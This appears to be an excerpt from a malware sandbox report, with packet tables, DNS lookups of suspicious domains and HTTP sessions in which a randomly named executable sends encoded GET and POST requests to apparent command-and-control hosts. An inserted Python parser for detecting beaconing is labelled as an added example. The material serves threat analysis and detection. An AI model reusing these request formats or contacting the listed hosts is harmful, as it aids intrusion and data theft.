Jul 3, 2024 15:59:59.213711977 CEST | 49786 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:59.218727112 CEST | 80 | 49786 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:00.232426882 CEST | 49787 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:00.239811897 CEST | 80 | 49787 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:00.240103960 CEST | 49787 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:00.244010925 CEST | 49787 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:00.250396013 CEST | 80 | 49787 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:00.696305990 CEST | 80 | 49787 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:00.696362019 CEST | 49787 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:01.744915009 CEST | 49787 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:01.749897003 CEST | 80 | 49787 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.763834953 CEST | 49788 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:02.769258976 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.769341946 CEST | 49788 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:02.772445917 CEST | 49788 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:02.777430058 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777445078 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777463913 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777475119 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777483940 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777554035 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777565002 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777618885 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:02.777628899 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:03.245779991 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:03.245904922 CEST | 49788 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:04.306029081 CEST | 49788 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:04.310868979 CEST | 80 | 49788 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:05.313956022 CEST | 49789 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:05.318977118 CEST | 80 | 49789 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:05.324259043 CEST | 49789 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:05.324259043 CEST | 49789 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:05.329134941 CEST | 80 | 49789 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:05.782807112 CEST | 80 | 49789 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:05.783041954 CEST | 80 | 49789 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 16:00:05.783158064 CEST | 49789 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:05.785561085 CEST | 49789 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 16:00:05.790371895 CEST | 80 | 49789 | 3.33.130.190 | 192.168.2.4
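The packet tables in this report were extracted with their columns run together (timestamp, source port, destination port, source IP and destination IP fused into one string, e.g. `CEST4977480192.168.2.43.33.130.190`), which makes them hard to feed into any further analysis. The following is an added example, not part of the sandbox report: a parser that recovers the five fields from such a row, resolving the ambiguous digit boundaries by requiring exactly one address to be the analysis host (192.168.2.4, taken from the report) and the ephemeral port to sit on that host's side (the 49152 cut-off is the Windows default dynamic range and is an assumption of this example), followed by a per-peer summary of how many connections were opened and how regularly. The sample rows are copied from the TCP table above and the DNS table that follows.

```python
"""Recover fields from sandbox packet rows whose columns were run together on extraction,
then summarise connection cadence per peer. Added example; not part of the report."""
import re
from collections import defaultdict
from datetime import datetime

SANDBOX_HOST = "192.168.2.4"   # the analysis VM's address, present in every row of the report
EPHEMERAL_MIN = 49152          # Windows default dynamic port range start (assumption used to disambiguate)

# Constructed sample: rows copied from this report's TCP and UDP tables, in the fused form
# "<timestamp> <TZ><src port><dst port><src IP><dst IP>" produced by the extraction.
SAMPLE_ROWS = """\
Jul 3, 2024 15:59:11.879935980 CEST4977480192.168.2.43.33.130.190
Jul 3, 2024 15:59:11.884865046 CEST80497743.33.130.190192.168.2.4
Jul 3, 2024 15:59:14.549169064 CEST4977580192.168.2.43.33.130.190
Jul 3, 2024 15:59:17.130686045 CEST4977680192.168.2.43.33.130.190
Jul 3, 2024 15:59:25.498460054 CEST4977880192.168.2.4162.241.2.92
Jul 3, 2024 15:59:25.503398895 CEST8049778162.241.2.92192.168.2.4
Jul 3, 2024 15:59:28.028933048 CEST4977980192.168.2.4162.241.2.92
Jul 3, 2024 15:56:43.605340958 CEST6410753192.168.2.41.1.1.1
Jul 3, 2024 15:56:44.045557022 CEST53641071.1.1.1192.168.2.4
Jul 3, 2024 15:56:59.999666929 CEST6021253192.168.2.41.1.1.1
"""

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) (?P<tz>[A-Z]+)(?P<tail>[\d.]+)$"
)


def _octet_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def _split_ips(rest):
    """Yield every (ip_a, ip_b) reading of two dotted quads run together, e.g. '192.168.2.43.33.130.190'."""
    tok = rest.split(".")
    if len(tok) != 7 or not all(tok):       # the 4th token is A's last octet fused with B's first
        return
    for cut in range(1, len(tok[3])):
        a = tok[:3] + [tok[3][:cut]]
        b = [tok[3][cut:]] + tok[4:]
        if all(_octet_ok(o) for o in a + b):
            yield ".".join(a), ".".join(b)


def parse_row(line):
    """Split one fused row into fields. Candidate splits such as 4977/480 vs 49774/80 are resolved by
    requiring exactly one address to be the sandbox host and the ephemeral port to sit on that side."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    tail, found = m.group("tail"), set()
    for l1 in range(1, 6):
        for l2 in range(1, 6):
            sp, dp, rest = tail[:l1], tail[l1:l1 + l2], tail[l1 + l2:]
            if not (_port_ok(sp) and _port_ok(dp)):
                continue
            for sip, dip in _split_ips(rest):
                if (sip == SANDBOX_HOST) == (dip == SANDBOX_HOST):
                    continue
                host_port, peer_port = (int(sp), int(dp)) if sip == SANDBOX_HOST else (int(dp), int(sp))
                if host_port >= EPHEMERAL_MIN > peer_port:
                    found.add((int(sp), int(dp), sip, dip))
    if len(found) != 1:
        raise ValueError(f"cannot split {tail!r} unambiguously: {sorted(found)}")
    sp, dp, sip, dip = found.pop()
    head, frac = m.group("ts").rsplit(".", 1)          # strptime's %f accepts at most 6 digits
    ts = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return {"ts": ts, "tz": m.group("tz"), "sport": sp, "dport": dp, "sip": sip, "dip": dip}


def summarize(lines):
    """Per peer ip:port, count distinct connections (one per host ephemeral port) and the mean gap
    between their first packets; a short, regular gap repeated across peers is what a beaconing check keys on."""
    first_seen = defaultdict(dict)                    # (peer, service port) -> {host port: first ts}
    for line in lines:
        if not line.strip():
            continue
        r = parse_row(line)
        if r["sip"] == SANDBOX_HOST:
            key, hport = (r["dip"], r["dport"]), r["sport"]
        else:
            key, hport = (r["sip"], r["sport"]), r["dport"]
        seen = first_seen[key]
        seen[hport] = min(seen.get(hport, r["ts"]), r["ts"])
    out = {}
    for (peer, port), conns in first_seen.items():
        times = sorted(conns.values())
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        out[f"{peer}:{port}"] = {"connections": len(conns),
                                 "mean_gap_s": round(sum(gaps) / len(gaps), 3) if gaps else None}
    return out


if __name__ == "__main__":
    for peer, stats in summarize(SAMPLE_ROWS.splitlines()).items():
        print(f"{peer:<22} connections={stats['connections']}  mean_gap_s={stats['mean_gap_s']}")
```

`parse_row` raises rather than guessing when more than one split survives the host/ephemeral rule, which is the right failure mode for evidence you intend to pivot on; if your sandbox uses a different guest address or port range, change the two constants at the top.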
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Jul 3, 2024 15:56:43.605340958 CEST | 64107 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:56:44.045557022 CEST | 53 | 64107 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:56:59.999666929 CEST | 60212 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:57:00.183504105 CEST | 53 | 60212 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:57:13.529422998 CEST | 51138 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:57:13.899224997 CEST | 53 | 51138 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:57:27.170097113 CEST | 52601 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:57:27.381876945 CEST | 53 | 52601 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:57:41.640121937 CEST | 63027 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:57:41.690493107 CEST | 53 | 63027 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:57:56.171031952 CEST | 56479 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:57:56.187910080 CEST | 53 | 56479 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:58:09.747944117 CEST | 55087 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:58:09.947638035 CEST | 53 | 55087 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:58:23.108542919 CEST | 60568 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:58:23.506375074 CEST | 53 | 60568 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:58:37.163914919 CEST | 54085 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:58:37.174453974 CEST | 53 | 54085 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:58:45.232752085 CEST | 49477 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:58:45.284346104 CEST | 53 | 49477 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:58:58.529818058 CEST | 59328 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:58:58.552629948 CEST | 53 | 59328 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:59:11.813896894 CEST | 64185 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:59:11.876440048 CEST | 53 | 64185 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:59:25.172182083 CEST | 57047 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:59:25.496218920 CEST | 53 | 57047 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:59:43.854212999 CEST | 60020 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:59:44.343368053 CEST | 53 | 60020 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 15:59:57.563951015 CEST | 50996 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 15:59:57.702621937 CEST | 53 | 50996 | 1.1.1.1 | 192.168.2.4
                                                          Jul 3, 2024 16:00:10.795758963 CEST | 64609 | 53 | 192.168.2.4 | 1.1.1.1
                                                          Jul 3, 2024 16:00:11.006990910 CEST | 53 | 64609 | 1.1.1.1 | 192.168.2.4
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Jul 3, 2024 15:56:43.605340958 CEST | 192.168.2.4 | 1.1.1.1 | 0x7fde | Standard query (0) | www.immedu.website | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:56:59.999666929 CEST | 192.168.2.4 | 1.1.1.1 | 0xf5bd | Standard query (0) | www.eoghenluire.com | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:13.529422998 CEST | 192.168.2.4 | 1.1.1.1 | 0xf63 | Standard query (0) | www.ajjmamlllqqq.xyz | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:27.170097113 CEST | 192.168.2.4 | 1.1.1.1 | 0x2eb7 | Standard query (0) | www.114lala.net | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:41.640121937 CEST | 192.168.2.4 | 1.1.1.1 | 0x5479 | Standard query (0) | www.shabygreen.top | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:56.171031952 CEST | 192.168.2.4 | 1.1.1.1 | 0x5a14 | Standard query (0) | www.077551.xyz | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:09.747944117 CEST | 192.168.2.4 | 1.1.1.1 | 0xf2fe | Standard query (0) | www.costmoon.com | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:23.108542919 CEST | 192.168.2.4 | 1.1.1.1 | 0x997 | Standard query (0) | www.w25dn.top | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:37.163914919 CEST | 192.168.2.4 | 1.1.1.1 | 0xa5c7 | Standard query (0) | www.indotop77.art | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:45.232752085 CEST | 192.168.2.4 | 1.1.1.1 | 0x5d79 | Standard query (0) | www.n-ambu.com | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:58.529818058 CEST | 192.168.2.4 | 1.1.1.1 | 0x33b9 | Standard query (0) | www.qrdinamicos.com | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:11.813896894 CEST | 192.168.2.4 | 1.1.1.1 | 0xf429 | Standard query (0) | www.g2m-os.com | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:25.172182083 CEST | 192.168.2.4 | 1.1.1.1 | 0xf31f | Standard query (0) | www.vendasnaweb1.com | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:43.854212999 CEST | 192.168.2.4 | 1.1.1.1 | 0x96f6 | Standard query (0) | www.dudapolicarpo.online | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:57.563951015 CEST | 192.168.2.4 | 1.1.1.1 | 0xf4d8 | Standard query (0) | www.rodotest2.pro | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 16:00:10.795758963 CEST | 192.168.2.4 | 1.1.1.1 | 0x9a45 | Standard query (0) | www.voupeclients.com | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Jul 3, 2024 15:56:44.045557022 CEST | 1.1.1.1 | 192.168.2.4 | 0x7fde | No error (0) | www.immedu.website |  | 185.106.178.60 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:00.183504105 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5bd | No error (0) | www.eoghenluire.com | eoghenluire.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:00.183504105 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5bd | No error (0) | eoghenluire.com |  | 76.223.105.230 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:00.183504105 CEST | 1.1.1.1 | 192.168.2.4 | 0xf5bd | No error (0) | eoghenluire.com |  | 13.248.243.5 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:13.899224997 CEST | 1.1.1.1 | 192.168.2.4 | 0xf63 | No error (0) | www.ajjmamlllqqq.xyz |  | 35.244.172.47 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:27.381876945 CEST | 1.1.1.1 | 192.168.2.4 | 0x2eb7 | No error (0) | www.114lala.net |  | 154.23.7.170 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:41.690493107 CEST | 1.1.1.1 | 192.168.2.4 | 0x5479 | No error (0) | www.shabygreen.top |  | 203.161.41.205 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:56.187910080 CEST | 1.1.1.1 | 192.168.2.4 | 0x5a14 | No error (0) | www.077551.xyz |  | 104.21.84.69 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:57:56.187910080 CEST | 1.1.1.1 | 192.168.2.4 | 0x5a14 | No error (0) | www.077551.xyz |  | 172.67.187.202 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:09.947638035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf2fe | No error (0) | www.costmoon.com |  | 74.208.236.38 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:23.506375074 CEST | 1.1.1.1 | 192.168.2.4 | 0x997 | No error (0) | www.w25dn.top | w25dn.top |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:23.506375074 CEST | 1.1.1.1 | 192.168.2.4 | 0x997 | No error (0) | w25dn.top |  | 38.47.232.185 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:37.174453974 CEST | 1.1.1.1 | 192.168.2.4 | 0xa5c7 | Name error (3) | www.indotop77.art | none | none | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:45.284346104 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d79 | No error (0) | www.n-ambu.com |  | 46.30.211.38 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:58:58.552629948 CEST | 1.1.1.1 | 192.168.2.4 | 0x33b9 | No error (0) | www.qrdinamicos.com |  | 217.160.0.119 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:11.876440048 CEST | 1.1.1.1 | 192.168.2.4 | 0xf429 | No error (0) | www.g2m-os.com | g2m-os.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:11.876440048 CEST | 1.1.1.1 | 192.168.2.4 | 0xf429 | No error (0) | g2m-os.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:11.876440048 CEST | 1.1.1.1 | 192.168.2.4 | 0xf429 | No error (0) | g2m-os.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:25.496218920 CEST | 1.1.1.1 | 192.168.2.4 | 0xf31f | No error (0) | www.vendasnaweb1.com | vendasnaweb1.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:25.496218920 CEST | 1.1.1.1 | 192.168.2.4 | 0xf31f | No error (0) | vendasnaweb1.com |  | 162.241.2.92 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:44.343368053 CEST | 1.1.1.1 | 192.168.2.4 | 0x96f6 | No error (0) | www.dudapolicarpo.online | dudapolicarpo.online |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:44.343368053 CEST | 1.1.1.1 | 192.168.2.4 | 0x96f6 | No error (0) | dudapolicarpo.online |  | 162.240.81.18 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:57.702621937 CEST | 1.1.1.1 | 192.168.2.4 | 0xf4d8 | No error (0) | www.rodotest2.pro | rodotest2.pro |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:57.702621937 CEST | 1.1.1.1 | 192.168.2.4 | 0xf4d8 | No error (0) | rodotest2.pro |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 15:59:57.702621937 CEST | 1.1.1.1 | 192.168.2.4 | 0xf4d8 | No error (0) | rodotest2.pro |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 16:00:11.006990910 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a45 | No error (0) | www.voupeclients.com | pixie.porkbun.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 3, 2024 16:00:11.006990910 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a45 | No error (0) | pixie.porkbun.com |  | 44.227.65.245 | A (IP address) | IN (0x0001) | false
                                                          Jul 3, 2024 16:00:11.006990910 CEST | 1.1.1.1 | 192.168.2.4 | 0x9a45 | No error (0) | pixie.porkbun.com |  | 44.227.76.166 | A (IP address) | IN (0x0001) | false
                                                          • www.immedu.website
                                                          • www.eoghenluire.com
                                                          • www.ajjmamlllqqq.xyz
                                                          • www.114lala.net
                                                          • www.shabygreen.top
                                                          • www.077551.xyz
                                                          • www.costmoon.com
                                                          • www.w25dn.top
                                                          • www.n-ambu.com
                                                          • www.qrdinamicos.com
                                                          • www.g2m-os.com
                                                          • www.vendasnaweb1.com
                                                          • www.dudapolicarpo.online
                                                          • www.rodotest2.pro
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.4 | 49736 | 185.106.178.60 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:56:44.059632063 CEST | 463 | OUT | GET /p5xb/?TvpPfhGp=gZSYabCnKqSr1J4TudILkU7OUr6zW8quS0K3SSEWSlTvQpNCKBnGards6ZD8X7yXO9b/F0Vh3EPZ273HAe14Zo8L5xIdhoBu33QGrF37ZE8rNfV+CMbs4i4=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.immedu.website
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:56:44.945144892 CEST | 510 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 03 Jul 2024 13:56:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 31 33 64 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 2e 31 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 66 33 38 35 78 77 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 22 20 2f 3e 20 20 20 20 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e 6c 61 2f 32 31 38 37 39 31 31 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 71 75 65 72 79 73 63 64 6e 73 2e 6e 65 74 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 13d<html><head> <meta charset="utf-8"><meta http-equiv="refresh" content="0.1; url=https://f385xw.com/register" /> <script type="text/javascript" src="https://js.users.51.la/21879113.js"></script></body><script type="text/javascript" src="https://cdn.jqueryscdns.net/jquery-3.7.1.min.js"></script></html>0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.4 | 49738 | 76.223.105.230 | 80 | 1908 | C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:57:00.193569899 CEST | 735 | OUT | POST /i3r0/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.eoghenluire.com
                                                          Origin: http://www.eoghenluire.com
                                                          Referer: http://www.eoghenluire.com/i3r0/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 37 79 59 74 63 43 6d 45 33 5a 6e 50 54 6f 72 65 75 77 35 6e 35 36 69 73 57 6e 78 46 2b 6f 56 69 32 36 6a 59 6e 53 69 2b 69 2b 31 36 78 4e 4a 74 72 4b 69 74 4d 4e 30 6b 52 36 38 51 73 6d 4d 77 70 48 57 49 52 49 75 54 69 53 33 2b 65 55 4d 42 66 6e 5a 56 63 62 52 55 4c 59 41 4b 42 59 77 6e 6d 2f 44 4d 31 55 43 4c 46 36 70 44 38 63 70 78 48 4c 34 4c 2f 2b 6f 4f 69 73 77 6b 51 43 5a 32 32 71 62 43 52 4b 65 49 64 53 70 79 42 75 53 61 53 65 7a 42 50 43 70 4f 2f 46 4a 50 6b 46 31 31 52 67 74 51 54 48 58 2f 30 6d 2f 63 77 30 2b 6f 75 67 39 69 75 63 30 6b 71 56 4b 6c 31 76 77 6d 2b 77 3d 3d
                                                          Data Ascii: TvpPfhGp=7yYtcCmE3ZnPToreuw5n56isWnxF+oVi26jYnSi+i+16xNJtrKitMN0kR68QsmMwpHWIRIuTiS3+eUMBfnZVcbRULYAKBYwnm/DM1UCLF6pD8cpxHL4L/+oOiswkQCZ22qbCRKeIdSpyBuSaSezBPCpO/FJPkF11RgtQTHX/0m/cw0+oug9iuc0kqVKl1vwm+w==
                                                          Jul 3, 2024 15:57:00.665910006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          content-type: text/html;charset=utf-8
                                                          content-length: 964
                                                          vary: Accept-Encoding
                                                          server: DPS/2.0.0+sha-aaf97e5
                                                          x-version: aaf97e5
                                                          x-siteid: us-east-1
                                                          set-cookie: dps_site_id=us-east-1; path=/
                                                          date: Wed, 03 Jul 2024 13:57:00 GMT
                                                          keep-alive: timeout=5
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 [TRUNCATED]
